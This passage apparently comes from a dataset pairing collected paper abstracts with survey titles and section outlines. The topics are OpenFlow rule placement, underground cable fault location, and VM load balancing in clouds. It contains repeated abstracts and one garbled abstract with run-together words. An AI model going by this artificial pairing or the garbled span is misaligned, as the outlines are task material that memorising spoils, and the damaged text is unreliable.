solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: The nature of data center traffic: measurements & analysis paper_content: We explore the nature of trac in data centers, designed to su p- port the mining of massive data sets. We instrument the servers to collect socket-level logs, with negligible performance impact. In a 1500 server operational cluster, we thus amass roughly a petabyte of measurements over two months, from which we obtain and re- portdetailedviewsoftracandcongestionconditionsandp atterns. We further consider whether trac matrices in the clustermi ght be obtained instead via tomographic inference from coarser-grained counter data. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Optimizing rule placement in software-defined networks for energy-aware routing paper_content: Software-defined Networks (SDN), in particular OpenFlow, is a new networking paradigm enabling innovation through network programmability. Over past few years, many applications have been built using SDN such as server load balancing, virtual-machine migration, traffic engineering and access control. In this paper, we focus on using SDN for energy-aware routing (EAR). Since traffic load has a small influence on power consumption of routers, EAR allows to put unused links into sleep mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding tables of network switches. However, fast SDN tables often cannot scale beyond a few hundred entries. This is because they typically include wildcards, and therefore are implemented using either expensive and power-hungry TCAMs, or complex and slow data structures. This paper presents the Palette distribution framework for decomposing large SDN tables into small ones and then distributing them across the network, while preserving the overall SDN policy semantics. Palette helps balance the sizes of the tables across the network, as well as reduce the total number of entries by sharing resources among different connections. It copes with two NP-hard optimization problems: Decomposing a large SDN table into equivalent subtables, and distributing the subtables such that each connection traverses each type of subtable at least once. To implement the Palette distribution framework, we introduce graph-theoretical formulations and algorithms, and show that they achieve close-to-optimal results in practice. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: An Adaptable Rule Placement for Software-Defined Networks paper_content: There is a strong trend in networking to move towards Software-Defined Networks (SDN). SDNs enable easier network configuration through a separation between a centralized controller and a distributed data plane comprising a network of switches. The controller implements network policies through installing rules on switches. Recently the "Big Switch" abstraction [1] was proposed as a specification mechanism for high-level network behavior, i.e., the network policies. The network operating system or compiler can use his specification for placing rules on individual switches. However, this is constrained by the limited capacity of the Ternary Content Addressable Memories (TCAMs) used for rules in each switch. We propose an Integer Linear Programming (ILP) based solution for placing rules on switches for a given firewall policy while optimizing for the total number of rules and meeting the switch capacity constraints. Experimental results demonstrate that our approach is scalable to practical sized networks. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: Hey, you darned counters!: get off my ASIC! paper_content: Software-Defined Networking (SDN) gains much of its value through the use of central controllers with global views of dynamic network state. To support a global view, SDN protocols, such as OpenFlow, expose several counters for each flow-table rule. These counters must be maintained by the data plane, which is typically implemented in hardware as an ASIC. ASIC-based counters are inflexible, and cannot easily be modified to compute novel metrics. These counters do not need to be on the ASIC. If the ASIC data plane has a fast connection to a general-purpose CPU with cost-effective memory, we can replace traditional counters with a stream of rule-match records, transmit this stream to the CPU, and then process the stream in the CPU. These software-defined counters allow far more flexible processing of counter-related information, and can reduce the ASIC area and complexity needed to support counters. --- paper_title: On the co-existence of distributed and centralized routing control-planes paper_content: Network operators can and do deploy multiple routing control-planes, e.g., by running different protocols or instances of the same protocol. With the rise of SDN, multiple control-planes are likely to become even more popular, e.g., to enable hybrid SDN or multi-controller deployments. Unfortunately, previous works do not apply to arbitrary combinations of centralized and distributed control-planes. In this paper, we develop a general theory for coexisting control-planes. We provide a novel, exhaustive classification of existing and future control-planes (e.g., OSPF, EIGRP, and Open-Flow) based on fundamental control-plane properties that we identify. Our properties are general enough to study centralized and distributed control-planes under a common framework. We show that multiple uncoordinated control-planes can cause forwarding anomalies whose type solely depends on the identified properties. To show the wide applicability of our framework, we leverage our theoretical insight to (i) provide sufficient conditions to avoid anomalies, (ii) propose configuration guidelines, and (iii) define a provably-safe procedure for reconfigurations from any (combination of) control-planes to any other. Finally, we discuss prominent consequences of our findings on the deployment of new paradigms (notably, SDN) and previous research works. --- paper_title: DomainFlow: practical flow management method using multiple flow tables in commodity switches paper_content: A scalable network with high bisection bandwidth and high availability requires efficient use of the multiple paths between pairs of end hosts. OpenFlow is an innovative technology and enables fine-grained, flow level control of Ethernet switching. However, the flow table structure defined by OpenFlow is not hardware friendly and the scalability is limited by the switch device. OpenFlow is also not sufficient for fast multipath failover. To overcome these limitations, we propose DomainFlow in which the network is split into sections and exact matches are used where possible to enable practical flow management using OpenFlow for commodity switches. We applied a prototype of DomainFlow to multipath flow management in the Virtual eXtensible LAN (VXLAN) overlay network environment. The total number of flow entries was reduced to 1/128 using currently available commodity switches, which was not possible before. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Theory and Applications of Robust Optimization paper_content: In this paper we survey the primary research, both theoretical and applied, in the area of Robust Optimization (RO). Our focus is on the computational attractiveness of RO approaches, as well as the modeling power and broad applicability of the methodology. In addition to surveying prominent theoretical results of RO, we also present some recent results linking RO to adaptable models for multi-stage decision-making problems. Finally, we highlight applications of RO across a wide spectrum of domains, including finance, statistics, learning, and various areas of engineering. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. ---
Title: Rules Placement Problem in OpenFlow Networks: A Survey Section 1: BACKGROUND Description 1: Write a background overview of SDN and OpenFlow, explaining their core principles and components. Section 2: MOTIVATION Description 2: Describe the motivations behind the OpenFlow rules placement problem, outlining use cases such as access control and traffic engineering. Section 3: PROBLEM FORMALIZATION Description 3: Formalize the OpenFlow rules placement problem, define the network model, and describe the essential inputs and constraints. Section 4: CHALLENGES Description 4: Discuss the primary challenges in the OpenFlow rules placement problem, namely resource limitations and signaling overhead. Section 5: EFFICIENT MEMORY MANAGEMENT Description 5: Survey and classify the techniques proposed in the literature for managing memory limitations in OpenFlow switches. Section 6: REDUCING SIGNALING OVERHEAD Description 6: Summarize the methods and ideas proposed to mitigate signaling overhead in OpenFlow rules placement. Section 7: FUTURE RESEARCH DIRECTIONS Description 7: Explore the potential future research areas and open questions within the context of the OpenFlow rules placement problem. Section 8: CONCLUSION Description 8: Conclude by summarizing the main points and the significance of solving the OpenFlow rules placement problem.
Cable Fault Monitoring and Indication: A Review
11
--- paper_title: Detection of Incipient Faults in Distribution Underground Cables paper_content: The incipient faults in underground cables are largely caused by voids in cable insulations or defects in splices or other accessories. This type of fault would repeatedly occur and subsequently develop to a permanent fault sooner or later after its first occurrence. Two algorithms are presented to detect and classify the incipient faults in underground cables at the distribution voltage levels. Based on the methodology of wavelet analysis, one algorithm is to detect the fault-induced transients, and therefore identify the incipient faults. Based on the analysis of the superimposed fault current and negative sequence current in the time domain, the other algorithm is particularly suitable to detect the single-line-to-ground (SLG) incipient faults, which are mostly occurring in underground cables. Both methods are designed to be applied in real systems. Hence, to verify the effectiveness and functionalities of the proposed schemes, different fault conditions, various system configurations, and real field cases are examined and other transients caused by permanent fault, capacitor switching, load changing, etc., are studied as well. --- paper_title: Ageing mechanisms and diagnostics for power cables - an overview paper_content: This paper describes briefly the main ageing and failure mechanisms and will indicate the advantages and limitations of the diagnostic tests available for the different insulation systems used in distribution and transmission cable systems. SC21 of CIGRE has addressed the subject of ageing factors and diagnostics of cable systems and has published three reports covering both fluid-filled and extruded cables. The reports describe ageing factors and several diagnostic methods, their purpose, and guidelines for use. --- paper_title: Computerized underground cable fault location expertise paper_content: Power Technologies, Inc. (PTI) developed an expert system and on-line advisor for the Electric Power Research Institute (EPRI). The system, FAULT, provides guidance for field crews to diagnose a cable failure, recommend applicable fault location techniques, and trouble-shoot resulting difficulties which occur during the process of locating underground cable faults on transmission and distribution cable systems. The fault location methods which were identified during development of the expert system are presented in this paper, along with utility statistics from a survey on underground cable fault location. > --- paper_title: Real-time expert system for fault location on high voltage underground distribution cables paper_content: To ensure minimum loss of system security and revenue it is essential that faults on underground cable systems be located and repaired rapidly. Currently in the UK, the impulse current method is used to prelocate faults, prior to using acoustic methods to pinpoint the fault location. The impulse current method is heavily dependent on the engineer's knowledge and experience in recognising/interpreting the transient waveforms produced by the fault. The development of a prototype real-time expert system and for the prelocation of cable faults is described. Results from the prototype demonstrate the feasibility and benefits of the expert system as an aid for the diagnosis and location of faults on underground cable systems. > --- paper_title: Impedance based fault location method for phase to phase and three phase faults in transmission systems paper_content: This paper presents a new impedance based fault location method in the case of phase to phase and three phase faults. This method utilized the measured impedance by distance relay and super imposed current factor, which is the ratio of post-fault current to super imposed current, to discriminate the fault position on the line. This method is robust against the fault resistance. The presented method only uses the measured impedance by distance relay, the super imposed current factor and few data which could be achieved through the SCADA based databases. (5 pages) --- paper_title: Automatic fault location for underground low voltage distribution networks paper_content: Summary form only given, as follows. This paper describes an automatic fault location technique for permanent faults in underground low voltage distribution networks (ULVDNs). It uses signals from an existing time domain reflectometry (TDR) instrument. It preprocesses TDR signals to eliminate reflections due to single-phase tee-offs, and to locate 3-phase open or short circuit faults and also uses adaptive filtering to compare the TDR signals to locate faults In essence, the procedure minimises the interpretation skill required from a user of a typical TDR based fault location instrument. The relative performance of the system is demonstrated using real field data. --- paper_title: Impedance based fault location method for phase to phase and three phase faults in transmission systems paper_content: This paper presents a new impedance based fault location method in the case of phase to phase and three phase faults. This method utilized the measured impedance by distance relay and super imposed current factor, which is the ratio of post-fault current to super imposed current, to discriminate the fault position on the line. This method is robust against the fault resistance. The presented method only uses the measured impedance by distance relay, the super imposed current factor and few data which could be achieved through the SCADA based databases. (5 pages) --- paper_title: Computerized underground cable fault location expertise paper_content: Power Technologies, Inc. (PTI) developed an expert system and on-line advisor for the Electric Power Research Institute (EPRI). The system, FAULT, provides guidance for field crews to diagnose a cable failure, recommend applicable fault location techniques, and trouble-shoot resulting difficulties which occur during the process of locating underground cable faults on transmission and distribution cable systems. The fault location methods which were identified during development of the expert system are presented in this paper, along with utility statistics from a survey on underground cable fault location. > ---
Title: Cable Fault Monitoring and Indication: A Review Section 1: Introduction Description 1: Introduce the importance of accurate fault location in power systems, explaining the challenges and need for efficient fault location methods in transmission and underground power cable networks. Section 2: Types of Cable Faults Description 2: Describe various types of cable faults, including open conductor faults, shorted faults, and high impedance faults. Section 3: Open Conductor Fault Description 3: Explain what an open conductor fault is and provide details on its characteristics and implications. Section 4: Shorted Fault Description 4: Describe the characteristics of a shorted fault, emphasizing the low resistance path to ground. Section 5: High Impedance Fault Description 5: Discuss high impedance faults, detailing how they exhibit a high resistive path to ground and potential non-linear resistive characteristics. Section 6: Types of Faults Detection Description 6: Outline the different methods used to detect faults in power lines and cables, highlighting their suitability for each type of fault. Section 7: A-Frame Method Description 7: Provide an in-depth explanation of the A-Frame method, including its procedure, advantages, and limitations. Section 8: Thumper Method Description 8: Discuss the Thumper method, detailing its use of high voltage surges to locate faults and the challenges it presents. Section 9: Time Domain Reflectometry (TDR) Description 9: Describe the Time Domain Reflectometry (TDR) method, explaining its process and how it determines the fault location using signal reflections. Section 10: Bridge Method Description 10: Explain the Bridge method for locating faults, including the principles of modified Wheatstone circuits and specific bridge techniques like Murray and Glaser bridges. Section 11: Conclusions Description 11: Summarize the importance of fault location in power systems, reviewing the methods discussed and emphasizing the need for immediate fault indication and accurate location techniques.
A Survey on Load Balancing Algorithms for VM Placement in Cloud Computing
8
--- paper_title: Server virtualization architecture and implementation paper_content: Virtual machine technology, or virtualization, is gaining momentum in the information technology community. While virtual machines are not a new concept, recent advances in hardware and software technology have brought virtualization to the forefront of IT management. Stability, cost savings, and manageability are among the reasons for the recent rise of virtualization. Virtual machine solutions can be classified by hardware, software, and operating system/containers. From its inception on the mainframe to distributed servers on x86, the virtual machine has matured and will play an increasing role in systems management. --- paper_title: A Mathematical Programming Approach for Server Consolidation Problems in Virtualized Data Centers paper_content: Today's data centers offer IT services mostly hosted on dedicated physical servers. Server virtualization provides a technical means for server consolidation. Thus, multiple virtual servers can be hosted on a single server. Server consolidation describes the process of combining the workloads of several different servers on a set of target servers. We focus on server consolidation with dozens or hundreds of servers, which can be regularly found in enterprise data centers. Cost saving is among the key drivers for such projects. This paper presents decision models to optimally allocate source servers to physical target servers while considering real-world constraints. Our central model is proven to be an NP-hard problem. Therefore, besides an exact solution method, a heuristic is presented to address large-scale server consolidation projects. In addition, a preprocessing method for server load data is introduced allowing for the consideration of quality-of-service levels. Extensive experiments were conducted based on a large set of server load data from a data center provider focusing on managerial concerns over what types of problems can be solved. Results show that, on average, server savings of 31 percent can be achieved only by taking cycles in the server workload into account. --- paper_title: Allocation of Virtual Machines in Cloud Data Centers—A Survey of Problem Models and Optimization Algorithms paper_content: Data centers in public, private, and hybrid cloud settings make it possible to provision virtual machines (VMs) with unprecedented flexibility. However, purchasing, operating, and maintaining the underlying physical resources incurs significant monetary costs and environmental impact. Therefore, cloud providers must optimize the use of physical resources by a careful allocation of VMs to hosts, continuously balancing between the conflicting requirements on performance and operational costs. In recent years, several algorithms have been proposed for this important optimization problem. Unfortunately, the proposed approaches are hardly comparable because of subtle differences in the used problem models. This article surveys the used problem formulations and optimization algorithms, highlighting their strengths and limitations, and pointing out areas that need further research. --- paper_title: A Review on Load Balancing of Virtual Machine Resources in Cloud Computing paper_content: An effective load balance (LB) management achieves high performance computing (HPC) and green computing. Users can run their jobs on virtual machines (VMs). Virtual machine (VM) has own resources (CPU and memory). VM migrates from host to another host during fail of VM, hot spot and high resource demand. Effective LB management is based on scheduling policy and management Strategies. In this paper it is discussed the available scheduling mechanisms, goals and strategies of load balancing techniques. The aim of this work to elaborate the key analysis of research works on LB. --- paper_title: Live Migration of Multiple Virtual Machines with Resource Reservation in Cloud Computing Environments paper_content: Virtualization technology is currently becoming increasingly popular and valuable in cloud computing environments due to the benefits of server consolidation, live migration, and resource isolation. Live migration of virtual machines can be used to implement energy saving and load balancing in cloud data center. However, to our knowledge, most of the previous work concentrated on the implementation of migration technology itself while didn't consider the impact of resource reservation strategy on migration efficiency. This paper focuses on the live migration strategy of multiple virtual machines with different resource reservation methods. We first describe the live migration framework of multiple virtual machines with resource reservation technology. Then we perform a series of experiments to investigate the impacts of different resource reservation methods on the performance of live migration in both source machine and target machine. Additionally, we analyze the efficiency of parallel migration strategy and workload-aware migration strategy. The metrics such as downtime, total migration time, and workload performance overheads are measured. Experiments reveal some new discovery of live migration of multiple virtual machines. Based on the observed results, we present corresponding optimization methods to improve the migration efficiency. --- paper_title: Server-storage virtualization: integration and load balancing in data centers paper_content: We describe the design of an agile data center with integrated server and storage virtualization technologies. Such data centers form a key building block for new cloud computing architectures. We also show how to leverage this integrated agility for non-disruptive load balancing in data centers across multiple resource layers - servers, switches, and storage. We propose a novel load balancing algorithm called VectorDot for handling the hierarchical and multi-dimensional resource constraints in such systems. The algorithm, inspired by the successful Toyoda method for multi-dimensional knapsacks, is the first of its kind. We evaluate our system on a range of synthetic and real data center testbeds comprising of VMware ESX servers, IBM SAN Volume Controller, Cisco and Brocade switches. Experiments under varied conditions demonstrate the end-to-end validity of our system and the ability of VectorDot to efficiently remove overloads on server, switch and storage nodes. --- paper_title: Cost of Virtual Machine Live Migration in Clouds: A Performance Evaluation paper_content: Virtualization has become commonplace in modern data centers, often referred as "computing clouds". The capability of virtual machine live migration brings benefits such as improved performance, manageability and fault tolerance, while allowing workload movement with a short service downtime. However, service levels of applications are likely to be negatively affected during a live migration. For this reason, a better understanding of its effects on system performance is desirable. In this paper, we evaluate the effects of live migration of virtual machines on the performance of applications running inside Xen VMs. Results show that, in most cases, migration overhead is acceptable but cannot be disregarded, especially in systems where availability and responsiveness are governed by strict Service Level Agreements. Despite that, there is a high potential for live migration applicability in data centers serving modern Internet applications. Our results are based on a workload covering the domain of multi-tier Web 2.0 applications. --- paper_title: Live migration of virtual machines paper_content: Migrating operating system instances across distinct physical hosts is a useful tool for administrators of data centers and clusters: It allows a clean separation between hard-ware and software, and facilitates fault management, load balancing, and low-level system maintenance. By carrying out the majority of migration while OSes continue to run, we achieve impressive performance with minimal service downtimes; we demonstrate the migration of entire OS instances on a commodity cluster, recording service downtimes as low as 60ms. We show that that our performance is sufficient to make live migration a practical tool even for servers running interactive loads. In this paper we consider the design options for migrating OSes running services with liveness constraints, focusing on data center and cluster environments. We introduce and analyze the concept of writable working set, and present the design, implementation and evaluation of high-performance OS migration built on top of the Xen VMM. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: Multi-Cloud: expectations and current approaches paper_content: Using resources and services from multiple Clouds is a natural evolution from consuming the ones from in-silo Clouds. Technological and administrative barriers are however slowing the process. Fortunately the recent years are marked by the appearance of several solutions that are partially overpassing them. However, the approaches are quite various and not adopted at large scale. This paper intends to offer a snapshot of the current state-of-the-art and to identify the future steps in building Multi-Clouds. A list of basic requirements for a Multi-Cloud is proposed. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: An online load balancing scheduling algorithm for cloud data centers considering real-time multi-dimensional resource paper_content: In general, load-balance scheduling is NP-hard problem as proved in many open literatures. We introduce an online load balancing resource scheduling algorithm (OLRSA) for Cloud datacenters considering real-time and multi-dimensional resources. Unlike traditional load balance scheduling algorithms which often consider only one factor such as the CPU load in physical servers, OLRSA treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop and apply integrated measurement for each server and a Cloud datacenter. Simulation results show that OLRSA has better performance than a few related load-balancing algorithms with regard to total imbalance level, makespan, as well as overall load efficiency. --- paper_title: A comparison of centralized and distributed meta-scheduling architectures for computation and communication tasks in Grid networks paper_content: The management of Grid resources requires scheduling of both computation and communication tasks at various levels. In this study, we consider the two constituent sub-problems of Grid scheduling, namely: (i) the scheduling of computation tasks to processing resources and (ii) the routing and scheduling of the data movement in a Grid network. Regarding computation tasks, we examine two typical online task scheduling algorithms that employ advance reservations and perform full network simulation experiments to measure their performance when implemented in a centralized or distributed manner. Similarly, for communication tasks, we compare two routing and data scheduling algorithms that are implemented in a centralized or a distributed manner. We examine the effect network propagation delay has on the performance of these algorithms. Our simulation results indicate that a distributed architecture with an exhaustive resource utilization update strategy yields better average end-to-end delay performance than a centralized architecture. --- paper_title: CloudCmp: comparing public cloud providers paper_content: While many public cloud providers offer pay-as-you-go computing, their varying approaches to infrastructure, virtualization, and software services lead to a problem of plenty. To help customers pick a cloud that fits their needs, we develop CloudCmp, a systematic comparator of the performance and cost of cloud providers. CloudCmp measures the elastic computing, persistent storage, and networking services offered by a cloud along metrics that directly reflect their impact on the performance of customer applications. CloudCmp strives to ensure fairness, representativeness, and compliance of these measurements while limiting measurement cost. Applying CloudCmp to four cloud providers that together account for most of the cloud customers today, we find that their offered services vary widely in performance and costs, underscoring the need for thoughtful provider selection. From case studies on three representative cloud applications, we show that CloudCmp can guide customers in selecting the best-performing provider for their applications. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere 